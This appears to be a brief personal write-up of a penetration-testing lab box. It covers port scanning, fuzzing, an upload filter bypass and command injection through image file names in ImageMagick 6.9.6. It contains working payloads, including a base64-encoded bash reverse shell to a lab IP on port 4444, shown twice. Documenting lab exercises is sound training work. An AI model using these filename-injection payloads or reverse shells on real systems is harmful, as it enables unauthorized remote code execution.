Open WDavid404 opened 1 month ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
80/tcp: ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.214.178/FUZZ -mc 200 --> no info
Try upload a php file -->
Change php to php.jpg -->
ImageMagick 6.9.6 exploit info
-->
E.g. cp smile.gif '|smile"cat test.txt > leak.txt
".gif'
---->
cp image.jpg '|smile"
echo ".jpg'
https://www.revshells.com/
-->
cp image.jpg '|smile"
echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'
After upload the file, we got a reverse shell
linpeas
Key points:
cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'